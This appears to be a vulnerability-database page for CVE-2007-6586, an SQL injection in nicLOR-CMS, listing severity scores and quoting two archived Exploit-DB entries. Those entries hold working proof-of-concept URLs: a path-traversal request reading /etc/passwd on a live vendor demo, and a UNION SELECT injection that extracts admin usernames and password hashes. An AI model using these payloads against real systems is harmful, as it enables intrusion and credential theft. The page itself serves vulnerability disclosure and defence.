CVE-2007-6586
published 2007-12-28CVE-2007-6586: SQL injection vulnerability in sezione_news.php in nicLOR-CMS allows remote attackers to execute arbitrary SQL commands via the id parameter in a sezione page…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.3th percentile
SQL injection vulnerability in sezione_news.php in nicLOR-CMS allows remote attackers to execute arbitrary SQL commands via the id parameter in a sezione page action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| niclor | niclor | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
nicLOR Puglia Landscape - Local File Inclusion
exploitdb·2008-11-04
CVE-2007-6586 nicLOR Puglia Landscape - Local File Inclusion
nicLOR Puglia Landscape - Local File Inclusion
---
/*
Puglia_Landscape Local File Inclusion Vulnerability
Discovered By StAkeR[at]hotmail[dot]it
http://www.niclor.net/prodotti/Puglia_Landscape
* Local File Inclusion
* Note: Magic_Quotes_GPC Off
- index.php?id=../../../../../../../[Local File and NullByte]
- index.php?id=../../../../../../../etc/passwd%00
* Demo
- http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
*/
# milw0rm.com [2008-11-04]
Exploit-DB
nicLOR CMS - 'sezione_news.php' SQL Injection
exploitdb·2007-12-21
CVE-2007-6586 nicLOR CMS - 'sezione_news.php' SQL Injection
nicLOR CMS - 'sezione_news.php' SQL Injection
---
Name : nicLOR-CMS SQL Injection Vulnerability.
Author : x0kster
Email : [email protected]
Script Download : http://www.niclor.net/prodotti/16-04-06-niclor_cms.zip
Date : 21/12/2007
#SQL Injection in sezione_news.php
So we can exploit the $intSezioneID and execute an sql injection.
PoC:
http://example.com/nicLOR-CMS/index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login/*
And then we'll get the username and the hash of the admin.
# milw0rm.com [2007-12-21]
No writeups or analysis indexed.
2007-12-28
Published